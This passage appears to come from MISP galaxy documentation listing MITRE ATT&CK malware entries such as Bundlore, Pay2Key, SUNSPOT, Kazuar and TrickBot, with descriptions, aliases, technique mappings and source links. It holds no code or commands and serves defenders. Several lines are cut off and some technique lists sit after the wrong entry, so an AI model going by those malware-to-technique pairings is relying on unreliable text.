uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-
• uses: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1559.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

**Table 4752. Table References**

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<td><a href="https://hub.dragos.com/hubfs/Year-in-Review/Dragos_2020_ICS_Cybersecurity_Year_In_Review.pdf?hsCtaTracking=159c0fc3-92d8-425daeab8-1282f2297e8%7Cf163726d-579b-4996-9a04-44e5a124d770">https://hub.dragos.com/hubfs/Year-in-Review/Dragos_2020_ICS_Cybersecurity_Year_In_Review.pdf?hsCtaTracking=159c0fc3-92d8-425daeab8-1282f2297e8%7Cf163726d-579b-4996-9a04-44e5a124d770</a></td>
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**Bundlore - S0482**

[Bundlore](https://attack.mitre.org/software/S0482) is adware written for macOS that has been in use since at least 2015. Though categorized as adware, [Bundlore](https://attack.mitre.org/software/S0482) has many features associated with more traditional backdoors. ([Citation: MacKeeper Bundlore Apr 2019](https://attack.mitre.org/software/S0482))

The tag is: *misp-galaxy:mitre-malware="Bundlore - S0482"*
Bundlore - S0482 is also known as:

- Bundlore
- OSX.Bundlore

Bundlore - S0482 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Launch Agent - T1543.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Launch Daemon - T1543.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="SSH Authorized Keys - T1098.004" with estimative-language:likelihood-probability="almost-certain"
More_eggs - S0284

[More_eggs](https://attack.mitre.org/software/S0284) is a JScript backdoor used by [Cobalt Group](https://attack.mitre.org/groups/G0080) and [FIN6](https://attack.mitre.org/groups/G0037). Its name was given based on the variable "More_eggs" being present in its code. There are at least two different versions of the backdoor being used, version 2.0 and version 4.4. (Citation: Talos Cobalt Group July 2018)(Citation: Security Intelligence More Eggs Aug 2019)

The tag is: `misp-galaxy:mitre-malware="More_eggs - S0284"`

More_eggs - S0284 is also known as:

- More_eggs
- SKID
- Terra Loader
- SpicyOmelette

More_eggs - S0284 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"
yty - S0248

[yty](https://attack.mitre.org/software/S0248) is a modular, plugin-based malware framework. The components of the framework are written in a variety of programming languages. (Citation: ASERT Donot March 2018)

The tag is: `misp-galaxy:mitre-malware="yty - S0248"`

yty - S0248 is also known as:

- yty

yty - S0248 has relationships with:

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**Table 4754. Table References**

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<tr>
<td><a href="https://attack.mitre.org/software/S0284">https://attack.mitre.org/software/S0284</a></td>
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<tr>
<td><a href="https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/">https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/</a></td>
</tr>
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</table>
- uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0248">https://attack.mitre.org/software/S0248</a></td>
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**ShiftyBug - S0294**

[ShiftyBug](https://attack.mitre.org/software/S0294) is an auto-rooting adware family of malware for Android. The family is very similar to the other Android families known as Shedun, Shuanet, Kemoge, though it is not believed all the families were created by the same group. (Citation: Lookout-Adware)
The tag is: `misp-galaxy:mitre-malware="ShiftyBug - S0294"`

ShiftyBug - S0294 is also known as:

- ShiftyBug

ShiftyBug - S0294 has relationships with:

- similar: `misp-galaxy:android="Kemoge" with estimative-language:likelihood-probability="likely"`
- uses: `misp-galaxy:mitre-attack-pattern="Exploit OS Vulnerability - T1404" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0294">https://attack.mitre.org/software/S0294</a></td>
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<tr>
<td><a href="https://blog.lookout.com/blog/2015/11/04/trojanized-adware/">https://blog.lookout.com/blog/2015/11/04/trojanized-adware/</a></td>
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</table>

**CookieMiner - S0492**

[CookieMiner](https://attack.mitre.org/software/S0492) is mac-based malware that targets information associated with cryptocurrency exchanges as well as enabling cryptocurrency mining on the victim system itself. It was first discovered in the wild in 2019.(Citation: Unit42 CookieMiner Jan 2019)

The tag is: `misp-galaxy:mitre-malware="CookieMiner - S0492"`

CookieMiner - S0492 is also known as:

- CookieMiner

CookieMiner - S0492 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-
Pay2Key - S0556

[Pay2Key](https://attack.mitre.org/software/S0556) is a ransomware written in C++ that has been used by [Fox Kitten](https://attack.mitre.org/groups/G0117) since at least July 2020 including campaigns against Israeli companies. [Pay2Key](https://attack.mitre.org/software/S0556) has been incorporated with a leak site to display stolen sensitive information to further pressure victims into payment.(Citation: ClearSky Fox Kitten February 2020)(Citation: Check Point Pay2Key November 2020)

The tag is: misp-galaxy:mitre-malware="Pay2Key - S0556"

Pay2Key - S0556 is also known as:

- Pay2Key

Pay2Key - S0556 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"

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<tr>
<td><a href="https://attack.mitre.org/software/S0556">https://attack.mitre.org/software/S0556</a></td>
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<tr>
<td><a href="https://www.clearskysec.com/fox-kitten/">https://www.clearskysec.com/fox-kitten/</a></td>
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<tr>
<td><a href="https://research.checkpoint.com/2020/ransomware-alert-pay2key/">https://research.checkpoint.com/2020/ransomware-alert-pay2key/</a></td>
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</table>

**DDKONG - S0255**

[DDKONG](https://attack.mitre.org/software/S0255) is a malware sample that was part of a campaign by [Rancor](https://attack.mitre.org/groups/G0075). [DDKONG](https://attack.mitre.org/software/S0255) was first seen used in February 2017. (Citation: Rancor Unit42 June 2018)

The tag is: *misp-galaxy:mitre-malware="DDKONG - S0255"*

**DDKONG - S0255** is also known as:

- **DDKONG**

**DDKONG - S0255** has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
KGH_SPY - S0526

[KGH_SPY](https://attack.mitre.org/software/S0526) is a modular suite of tools used by [Kimsuky](https://attack.mitre.org/groups/G0094) for reconnaissance, information stealing, and backdoor capabilities. [KGH_SPY](https://attack.mitre.org/software/S0526) derived its name from PDB paths and internal names found in samples containing "KGH".(Citation: Cybereason Kimsuky November 2020)

The tag is: `misp-galaxy:mitre-malware="KGH_SPY - S0526"`

KGH_SPY - S0526 is also known as:

- KGH_SPY
- KGH_SPY

KGH_SPY - S0526 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Logon Script (Windows) - T1037.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003"` with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Email Collection - T1114.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Credential Manager - T1555.004" with estimative-language:likelihood-probability="almost-certain"

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<tr>
<td><a href="https://attack.mitre.org/software/S0526">https://attack.mitre.org/software/S0526</a></td>
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</table>

**Kazuar - S0265**

[Kazuar](https://attack.mitre.org/software/S0265) is a fully featured, multi-platform backdoor Trojan written using the Microsoft .NET framework. (Citation: Unit 42 Kazuar May 2017)

The tag is: `misp-galaxy:mitre-malware="Kazuar - S0265"

Kazuar - S0265 is also known as:

- Kazuar

Kazuar - S0265 has relationships with:


- uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Scheduled Transfer - T1029" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"

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<tr>
<td><a href="https://attack.mitre.org/software/S0265">https://attack.mitre.org/software/S0265</a></td>
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<tr>
<td><a href="https://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/">https://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/</a></td>
</tr>
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</table>

**Mosquito - S0256**

[Mosquito](https://attack.mitre.org/software/S0256) is a Win32 backdoor that has been used by [Turla](https://attack.mitre.org/groups/G0010). [Mosquito](https://attack.mitre.org/software/S0256) is made up of three parts: the installer, the launcher, and the backdoor. The main backdoor is called CommanderDLL and is launched by the loader program. (Citation: ESET Turla Mosquito Jan 2018)

The tag is: *misp-galaxy:mitre-malware="Mosquito - S0256"*

Mosquito - S0256 is also known as:

- Mosquito

Mosquito - S0256 has relationships with:


- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0256">https://attack.mitre.org/software/S0256</a></td>
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**SUNSPOT - S0562**

[SUNSPOT](https://attack.mitre.org/software/S0562) is an implant that injected the [SUNBURST](https://attack.mitre.org/software/S0559) backdoor into the SolarWinds Orion software update framework. It was used by [APT29](https://attack.mitre.org/groups/G0016) since at least February 2020.(Citation: CrowdStrike SUNSPOT Implant January 2021)

The tag is: **misp-galaxy:mitre-malware="SUNSPOT - S0562"**

SUNSPOT - S0562 is also known as:
### SUNSPOT

SUNSPOT - S0562 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Execution Guardrails - T1480" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0562">https://attack.mitre.org/software/S0562</a></td>
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<td><a href="https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/">https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/</a></td>
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</table>

### UPPERCUT - S0275

[UPPERCUT](https://attack.mitre.org/software/S0275) is a backdoor that has been used by [menuPass](https://attack.mitre.org/groups/G0045). (Citation: FireEye APT10 Sept 2018)

The tag is: misp-galaxy:mitre-malware="UPPERCUT - S0275"

UPPERCUT - S0275 is also known as:

- UPPERCUT
- ANEL
UPPERCUT - S0275 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0275">https://attack.mitre.org/software/S0275</a></td>
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**VERMIN - S0257**

[VERMIN](https://attack.mitre.org/software/S0257) is a remote access tool written in the Microsoft .NET framework. It is mostly composed of original code, but also has some open source code. (Citation: Unit 42 VERMIN Jan 2018)

The tag is: *misp-galaxy:mitre-malware="VERMIN - S0257"*

VERMIN - S0257 is also known as:

- VERMIN

VERMIN - S0257 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-
• uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

Table 4765. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0257">https://attack.mitre.org/software/S0257</a></td>
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</tbody>
</table>
LookBack - S0582

[LookBack](https://attack.mitre.org/software/S0582) is a remote access trojan written in C++ that was used against at least three US utility companies in July 2019. The TALONITE activity group has been observed using [LookBack](https://attack.mitre.org/software/S0582).(Citation: Proofpoint LookBack Malware Aug 2019)(Citation: Dragos TALONITE)(Citation: Dragos Threat Report 2020)

The tag is: `misp-galaxy:mitre-malware="LookBack - S0582"`

LookBack - S0582 is also known as:

- LookBack

LookBack - S0582 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Service Stop - T1489"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140"` with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Shutdown/Reboot - T1529" with estimative-language:likelihood-probability="almost-certain"

Table 4766. Table References

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<td><a href="https://www.dragos.com/threat/talonite/">https://www.dragos.com/threat/talonite/</a></td>
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<td><a href="https://hub.dragos.com/hubfs/Year-in-Review/Dragos_2020_ICS_Cybersecurity_Year_In_Review.pdf?hsCtaTracking=159c0fc3-92d8-425d-aeb8-12824f2297e8%7Cf163726d-579b-4996-9a04-44e5a124d770">https://hub.dragos.com/hubfs/Year-in-Review/Dragos_2020_ICS_Cybersecurity_Year_In_Review.pdf?hsCtaTracking=159c0fc3-92d8-425d-aeb8-12824f2297e8%7Cf163726d-579b-4996-9a04-44e5a124d770</a></td>
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</table>

OldBoot - S0285

[OldBoot](https://attack.mitre.org/software/S0285) is an Android malware family. (Citation: HackerNews-OldBoot)

The tag is: misp-galaxy:mitre-malware="OldBoot - S0285"

OldBoot - S0285 is also known as:

- OldBoot

OldBoot - S0285 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Modify OS Kernel or Boot Partition - T1398" with estimative-language:likelihood-probability="almost-certain"

Table 4767. Table References

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<td><a href="https://attack.mitre.org/software/S0285">https://attack.mitre.org/software/S0285</a></td>
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<tr>
<td><a href="http://thehackernews.com/2014/01/first-widely-distributed-android.html">http://thehackernews.com/2014/01/first-widely-distributed-android.html</a></td>
</tr>
</tbody>
</table>

RGDoor - S0258

[RGDoor](https://attack.mitre.org/software/S0258) is a malicious Internet Information Services (IIS) backdoor developed in the C++ language. [RGDoor](https://attack.mitre.org/software/S0258) has been seen deployed on webservers belonging to the Middle East government organizations. [RGDoor](https://attack.mitre.org/software/S0258) provides backdoor access to compromised IIS servers. (Citation: Unit 42 RGDoor Jan 2018)

The tag is: misp-galaxy:mitre-malware="RGDoor - S0258"
RGDoor - S0258 is also known as:

- RGDoor

RGDoor - S0258 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

Table 4768. Table References

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<td><a href="https://attack.mitre.org/software/S0258">https://attack.mitre.org/software/S0258</a></td>
</tr>
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</table>

**Javali - S0528**

[Javali](https://attack.mitre.org/software/S0528) is a banking trojan that has targeted Portuguese and Spanish-speaking countries since 2017, primarily focusing on customers of financial institutions in Brazil and Mexico.(Citation: Securelist Brazilian Banking Malware July 2020)

The tag is: misp-galaxy:mitre-malware="Javali - S0528"

Javali - S0528 is also known as:

- Javali

Javali - S0528 has relationships with:

Table 4769. Table References

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<td><a href="https://attack.mitre.org/software/S0528">https://attack.mitre.org/software/S0528</a></td>
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**RCSAndroid - S0295**

[RCSAndroid](https://attack.mitre.org/software/S0295) is Android malware. (Citation: TrendMicro-RCSAndroid)

The tag is: `misp-galaxy:mitre-malware="RCSAndroid - S0295"`

RCSAndroid - S0295 is also known as:

- RCSAndroid

RCSAndroid - S0295 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Location Tracking - T1430"` with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Capture Clipboard Data - T1414" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0295">https://attack.mitre.org/software/S0295</a></td>
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**InnaputRAT - S0259**

[InnaputRAT](https://attack.mitre.org/software/S0259) is a remote access tool that can exfiltrate files from a victim's machine. [InnaputRAT](https://attack.mitre.org/software/S0259) has been seen out in the wild since 2016. (Citation: ASERT InnaputRAT April 2018)

The tag is: *misp-galaxy:mitre-malware="InnaputRAT - S0259"*

InnaputRAT - S0259 is also known as:

• InnaputRAT

InnaputRAT - S0259 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
CarbonSteal - S0529

[CarbonSteal](https://attack.mitre.org/software/S0529) is one of a family of four surveillanceware tools that share a common C2 infrastructure. [CarbonSteal](https://attack.mitre.org/software/S0529) primarily deals with audio surveillance. (Citation: Lookout Uyghur Campaign)

The tag is: `misp-galaxy:mitre-malware="CarbonSteal - S0529"`

CarbonSteal - S0529 is also known as:

- CarbonSteal

CarbonSteal - S0529 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426"` with estimative-language:likelihood-probability="almost-certain"
TrickBot - S0266

[TrickBot](https://attack.mitre.org/software/S0266) is a Trojan spyware program that has mainly been used for targeting banking sites in United States, Canada, UK, Germany, Australia, Austria, Ireland, London, Switzerland, and Scotland. TrickBot first emerged in the wild in September 2016 and appears to be a successor to [Dyre](https://attack.mitre.org/software/S0024). [TrickBot](https://attack.mitre.org/software/S0266) is developed in the C++ programming language. (Citation: S2 Grupo TrickBot June 2017) (Citation: Fidelis TrickBot Oct 2016) (Citation: IBM TrickBot Nov 2016)

The tag is: `misp-galaxy:mitre-malware="TrickBot - S0266"`

TrickBot - S0266 is also known as:

- TrickBot
- Totbrick
- TSPY_TRICKLOAD

TrickBot - S0266 has relationships with:
• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

